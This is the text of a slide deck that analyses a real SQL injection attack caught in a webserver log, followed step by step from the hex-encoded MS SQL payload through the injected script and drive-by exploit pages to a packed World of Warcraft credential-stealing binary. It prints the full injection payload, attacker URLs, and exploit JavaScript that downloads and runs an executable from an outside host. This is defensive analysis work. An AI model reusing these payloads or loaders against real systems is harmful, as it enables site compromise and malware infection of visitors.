SlideShare a Scribd company logo

Sql injection attack_analysis_py_vo

Download as PPTX, PDF
Jirka Vejrazka, profile picture
Jirka Vejrazka

A webserver log detected a potential SQL injection attack attempt. The log contained a long URL parameter string with encoded hexadecimal values and SQL statements declaring variables and executing a query to select data from tables and try to update values. The analysis showed it was trying to exploit the server through SQL injection.

Technology
1 of 36
Downloaded 11 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
Let’s play a game A true story of a web attack analysis
Introduction  Once upon a time, there was a personal webserver running Apache with mod_security(*) module  And then, something interesting happened... (*) An extremely useful module providing an additional level of security @JirkaV
The logfile entry  This entry appeared in the log: Message: Warning. Pattern match "(?:b(?:(?:s(?:electb(?:.{1,100}?b(?:(?:length|count|top)b.{1,100}?bfrom|fromb .{1,100}?bwhere)|.*?b(?:d(?:umpb.*bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_( ?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:;DECLARE @S CHAR(4000);SET @S. [id "950001"] [msg "SQL Injection Attack. Matched signature <cast(>"] [severity "CRITICAL"] GET /Bristol/BVC_Cambridge/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420 7661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F43 7572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379 736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E642061 2E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F722062 2E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7220 4645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C 4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B 275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420 7372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D 272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074 207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043 20454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F43757273 6F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 @JirkaV
The logfile entry  This entry appeared in the log: Message: Warning. Pattern match "(?:b(?:(?:s(?:electb(?:.{1,100}?b(?:(?:length|count|top)b.{1,100}?bfrom|fromb .{1,100}?bwhere)|.*?b(?:d(?:umpb.*bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_( ?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:;DECLARE @S CHAR(4000);SET @S. [id "950001"] [msg "SQL Injection Attack. Matched signature <cast(>"] [severity "CRITICAL"] GET /Bristol/BVC_Cambridge/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420 7661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F43 7572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379 736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E642061 2E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F722062 2E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7220 4645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C 4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B 275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420 7372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D 272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074 207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043 20454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F43757273 6F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 @JirkaV
Peeling the first layer  Let’s focus on the important stuff:  /Bristol/BVC_Cambridge/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206 F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626 C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D 302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B2 75D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A 2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657 26520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212 D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 @JirkaV
Peeling the first layer  Let’s focus on the important stuff:  DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206 F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626 C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D 302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B2 75D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A 2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657 26520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212 D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); @JirkaV
Peeling the first layer  Let’s focus on the important stuff:  CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206 F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626 C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D 302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B2 75D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A 2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657 26520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212 D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72 @JirkaV
Peeling the first layer  Let’s focus on the important stuff:  CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206 F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626 C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D 302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B2 75D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A 2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657 26520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212 D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72 @JirkaV
Peeling the first layer  Let’s focus on the important stuff:  CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 44 45 43 4C 41 D E C L A Those numbers seem to be ASCII codes in hex (base 16) 4445434C41 Let’s write a quick conversion utility ( in Python – my favourite  ) @JirkaV
Peeling the first layer  Convert to readable text: 4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204 445434C415245205461626C655F437572736F7220435552534F5220464F52... DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor from binascii import unhexlify data = '4445434C415245204054207661726368... text = [] for idx in range(len(data)/2): text.append(unhexlify(data[2*idx:2*idx+2])) print ''.join(text) @JirkaV
Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor @JirkaV
Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database @JirkaV
Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database • xtype=‘u’ => searches for object type “user table” ... @JirkaV
Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database • xtype=‘u’ => searches for object type “user table” ... • xtype=99, 35, ... => ... containing text (use Google) @JirkaV
Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database • xtype=‘u’ => searches for object type “user table” ... • xtype=99, 35, ... => ... containing text (use Google) • update => modifies the text in the database @JirkaV
Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database • xtype=‘u’ => searches for object type “user table” ... • xtype=99, 35, ... => ... containing text (use Google) • update => modifies the text in the database • injecting this HTML code, referencing a JavaScript @JirkaV
Summary #1  The SQL injection tries to modify data in the database serving HTML pages, hoping to inject a reference to malicious JavaScript code into every page in the database  Technically, it tries to modify any text in the database  Any web browser visiting the site after the attack would fetch and execute the JavaScript code So, what would the JavaScript do? @JirkaV
Analyzing the JavaScript  Download the JavaScript  Downloading JavaScript alone from its URL is relatively safe. There is no command to execute it, so the browser does not interpret it and displays it as a regular text  This makes it easy to analyze  Let’s download http://abc.verynx.cn/w.js @JirkaV
Analyzing the JavaScript  w.js analysis window.onerror=function(){return true;} if(typeof(js86h)=="undefined") { var js86h=1; function y_gVal(iz) {var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);} function y_g(name) {var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;} function cc_k() {var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime- y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}} var yesdata; yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution ='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAg ent); document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count21.51yes.com/sa.aspx?id=215052584'+yesdata+' height=0 width=0></iframe>'); document.write("<iframe width=100 height=100 src=http://mm.ll80.com/flash.htm></iframe>"); document.write("<iframe width=100 height=100 src=http://mm.ll80.com/123.htm></iframe>"); document.write ('<script>var a4452tf="51la";var a4452pu="";var a4452pf="51la";var a4452su=window.location;var a4452sf=document.referrer;var a4452of="";var a4452op="";var a4452ops=1;var a4452ot=1;var a4452d=new Date();var a4452color="";if (navigator.appName=="Netscape"){a4452color=screen.pixelDepth;} else {a4452color=screen.colorDepth;}</script><script>a4452tf=top.document.referrer;</script><script>a4452pu =window.parent.location;</script><script>a4452pf=window.parent.document.referrer;</script><script>a4452ops=document.cooki e.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a4452ops=(a4452ops==null)?1: (parseInt(unescape((a4452ops)[2]))+1);var a4452oe =new Date();a4452oe.setTime(a4452oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a4452ops+ ";path=/;expires="+a4452oe.toGMTString();a4452ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a4452ot==null){a4452ot=1;}else{a4452ot=parseInt(unescape((a4452ot)[2])); a4452ot=(a4452ops==1)?(a4452ot+1):(a4452ot);}a4452oe.setTime(a4452oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_o k_times="+a4452ot+";path=/;expires="+a4452oe.toGMTString();</script><script>a4452of=a4452sf;if(a4452pf!=="51la"){a4452of=a 4452pf;}if(a4452tf!=="51la"){a4452of=a4452tf;}a4452op=a4452pu;try{lainframe}catch(e){a4452op=a4452su;}document.write('<img style="display:hidden;width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for- Webmasters&svid=20&id=2024452&tpages='+a4452ops+'&ttimes='+a4452ot+'&tzone='+(0- a4452d.getTimezoneOffset()/60)+'&tcolor='+a4452color+'&sSize='+screen.width+','+screen.height+'&referrer='+escape(a 4452of)+'&vpage='+escape(a4452op)+'" />');</script>'); } @JirkaV
Analyzing the JavaScript  w.js analysis – stripped down to its backbone window.onerror=function(){return true;} document.write("<iframe width=100 height=100 src=http://mm.ll80.com/flash.htm></iframe>"); document.write("<iframe width=100 height=100 src=http://mm.ll80.com/123.htm></iframe>"); @JirkaV
Analyzing the JavaScript  Downloading the dangerous code  Since downloading the pages using a browser would do exactly what the attacker wanted, we’ll use safer approach  wget will download the HTML, but will not interpret it $ wget http://mm.ll80.com/123.htm --2008-07-23 19:55:09-- http://mm.ll80.com/123.htm Resolving mm.ll80.com... 60.173.11.119 Connecting to mm.ll80.com|60.173.11.119|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 431 [text/html] Saving to: `123.htm' @JirkaV
Analyzing the JavaScript  Side note  At this point, I’ve switched to Linux simple because the necessary tools are easily available there and the risk of doing something stupid (such as clicking on some HTML file) is a bit smaller.  Also, any possibly malicious code is slightly less likely to work – one of the reasons is that the attacker(s) seem to target Microsoft world (MS SQL, remember?) @JirkaV
Analyzing the injected HTML  Analyzing the HTML  Opening the HTML in a browser would be as bad as downloading it ... ... so we’ll use anything that does NOT understand HTML $ more 123.htm <iframe width=100 height=0 src=Ms06-014.htm> </iframe><iframe width=100 height=0 src=flash.htm> </iframe><iframe width=100 height=0 src=SP2.htm> </iframe><iframe width=100 height=0 src=Realplayer11.htm> </iframe><iframe width=100 height=0 src=Norton.htm> </iframe><iframe width=100 height=0 src=pxhack.htm> </iframe><script language="javascript“ type="text/javascript"src="http://js.users.51.la/2018815.js"></script> @JirkaV
Analyzing the injected HTML  Getting some more HTML  Time to download the other referenced HTML files  Again, using “wget”  It turns out, that each HTML file targets one vulnerability, trying to exploit it and download an executable  Let’s take a look... @JirkaV
Analyzing the injected HTML  Analyzing one exploit $ more Ms06-014.htm Svfox='http://mm.ll80.com/wow.exe'; qq853327659='C:MicroSoft.pif'; var Svfox_net=window["document"]["createElement"]("object"); Svfox_net["setAttribute"]("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var Svfox2=Svfox_net["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); var Svfox3=Svfox_net["CreateObject"]("Adodb.Stream",""); Svfox3["type"]=1; www_svfox_net=gn(10000); var hHf$R6=Svfox_net["CreateObject"]("Scripting.FileSystemObject",""); var VgDnZXHt7=hHf$R6["GetSpecialFolder"](0); www_svfox_net=hHf$R6["BuildPath"](VgDnZXHt7,www_svfox_net); var SmAcqIwGV8=Svfox_net["CreateObject"]("Shell.Application",""); exp1=hHf$R6["BuildPath"](VgDnZXHt7+'system32','cmd.exe'); SmAcqIwGV8["SHellExECuTe"](exp1,' /c echo C:MicroSoft.pif >C:MicroSoft.bat&echo del %0 >>C:MicroSoft.bat',"","open",0); @JirkaV
Analyzing the injected HTML  Another exploit $ more pxhack.htm <a href="http://www.pxhac<script defer> var objFSO = new ActiveXObject('Scripting.FileSystemObject'); var objStream = objFSO.OpenTextFile(strFile,ForWriting,true,false); objStream.WriteLine('var objArgs = 'http://mm.ll80.com/wow.exe';'); objStream.WriteLine('var objargss ='c:gtest.exe';'); objStream.WriteLine('var sGet=new ActiveXObject('ADODB.Stream');'); objStream.WriteLine('try {'); objStream.WriteLine('xGet = new XMLHttpRequest();'); objStream.WriteLine('}'); objStream.WriteLine('catch (trymicrosoft) {'); objStream.WriteLine('try {'); objStream.WriteLine('xGet = new ActiveXObject('Msxml2.XMLHTTP');'); @JirkaV
Analyzing the injected HTML  Exploits summary  All the HTML pages served only one purpose: To download wow.exe and execute it on victim’s computer  To achieve that, the attack tried to exploit multiple vulnerabilities in parallel to increase success probability.  The attack tried to exploit a web browser, flash, RealPlayer, ...  Why? Let’s see...  But first, another summary  @JirkaV
Summary #2  The SQL injection tried to modify HTML pages in the database ... It is time to look at wow.exe  ... so anyone visiting this site would run JavaScript from another site...  ... that loaded several pages with various exploits ...  ... all trying to download and execute wow.exe on our visitor’s PC ... the name rings a bell, but let’s not jump into conclusions... @JirkaV
Analyzing the binary  Checking wow.exe  Again, downloaded using wget $ xxd wow.exe | more 0000000: 4d5a 5000 0200 0000 0400 0f00 ffff 0000 MZP............. 0000010: b800 0000 0000 0000 4000 1a00 0000 0000 ........@....... 0000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000030: 0000 0000 0000 0000 0000 0000 0001 0000 ................ 0000040: ba10 000e 1fb4 09cd 21b8 014c cd21 9090 ........!..L.!.. 0000050: 5468 6973 2070 726f 6772 616d 206d 7573 This program mus 0000060: 7420 6265 2072 756e 2075 6e64 6572 2057 t be run under W 0000070: 696e 3332 0d0a 2437 0000 0000 0000 0000 in32..$7........ 00001f0: 0000 0000 0000 0000 5550 5830 0000 0000 ........UPX0.... 0000200: 00e0 0000 0010 0000 0000 0000 0004 0000 ................ 0000210: 0000 0000 0000 0000 0000 0000 8000 00e0 ................ 0000220: 5550 5831 0000 0000 0080 0000 00f0 0000 UPX1............ 0000230: 0076 0000 0004 0000 0000 0000 0000 0000 .v.............. 0000240: 0000 0000 4000 00e0 2e72 7372 6300 0000 ....@....rsrc... 0000250: 0010 0000 0070 0100 0002 0000 007a 0000 .....p.......z.. @JirkaV
Analyzing the binary  Unpacking $ upx -d wow.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 UPX 2.02 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 13th 2006 File size Ratio Format Name -------------------- ------ ----------- ----------- 43110 <- 33382 77.43% win32/pe wow.exe  But the unpacked file is still not very readable. What now?  Time for a long shot – what if it’s double-packed? $ xxd wow.exe | grep UPX 0005100: 0000 0000 0000 0000 5550 5830 0000 0000 ........UPX0.... 0005130: 5550 5831 0000 0000 0050 0000 0020 0100 UPX1.....P... .. 00052f0: 5550 5821 0d09 0209 fd3d 1daa 6ca2 d7ff UPX!.....=..l... @JirkaV
Analyzing the binary  Unpacking wow.exe – the second time $ upx -d wow.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 UPX 2.02 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 13th 2006 File size Ratio Format Name -------------------- ------ ----------- ----------- upx: wow.exe: NotPackedException: not packed by UPX  Obviously, there is a bit of magic going on  But we don’t really care – we know a secret  @JirkaV
Analyzing the binary  Unpacking wow.exe – the second time (again) $ xxd wow.exe | grep MZ 0000000: 4d5a 5000 0200 0000 0400 0f00 ffff 0000 MZP............. 0004f10: 4d5a 5000 0200 0000 0400 0f00 ffff 0000 MZP............. 0006c30: 4402 c34d 5a89 50fc 1920 065b aef8 4ed7 D..MZ.P.. .[..N. Hmm, it seems that we have two headers there. Time to ask Python for help again... >>> data = open('wow.exe', 'rb').read() >>> data = data[0x4f10:] >>> open('wow_int.exe', 'wb').write(data) @JirkaV
Analyzing the binary  Unpacking wow.exe – the second time (again) $ ls -lh wow* -rw-r--r-- 1 jirka users 43K 2008-07-23 07:29 wow.exe -rw-r--r-- 1 jirka users 23K 2008-08-02 01:02 wow_int.exe $ upx -d wow_int.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 UPX 2.02 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 13th 2006 File size Ratio Format Name -------------------- ------ ----------- ----------- 44886 <- 22870 50.95% win32/pe wow_int.exe @JirkaV
Analyzing the binary  Unpacking wow.exe – the second time (again) $ strings wow_int.exe | more TObject u:hD SVWUQ SOFTWAREBlizzard EntertainmentWorld of Warcraft cn4.grunt.wowchina.com cn6.grunt.wowchina.com kr.logon.worldofwarcraft.com eu.logon.worldofwarcraft.com tw.logon.worldofwarcraft.com /flash.asp QQQQQ3 ZYYd offline action= update @JirkaV
Conclusion  What next?  The next step would be figuring out what exactly the code does with World of Warcraft... ...but games are not my cup of tea so I’ll stop here. @JirkaV
Overall Summary  So, the attack was using vulnerable web server to attack its clients.  Each client would be attacked using range of exploits in order to download and execute double-packed file  This file would contact World of Warcraft servers @JirkaV

More Related Content

PPT
Sql injection attacks
Nitish Kumar
 
PPTX
Protecting your data from SQL Injection attacks
Kevin Alcock
 
PPT
Sql Injection Attacks And Defense Presentatio (1)
guest32e5cfe
 
PPT
Sql injection
Nitish Kumar
 
PDF
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Pichaya Morimoto
 
PDF
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Pichaya Morimoto
 
PPTX
A8 cross site request forgery (csrf) it 6873 presentation
Albena Asenova-Belal
 
PPTX
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
Shivam Sahu
 
Sql injection attacks
Nitish Kumar
 
Protecting your data from SQL Injection attacks
Kevin Alcock
 
Sql Injection Attacks And Defense Presentatio (1)
guest32e5cfe
 
Sql injection
Nitish Kumar
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Pichaya Morimoto
 
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Pichaya Morimoto
 
A8 cross site request forgery (csrf) it 6873 presentation
Albena Asenova-Belal
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
Shivam Sahu
 

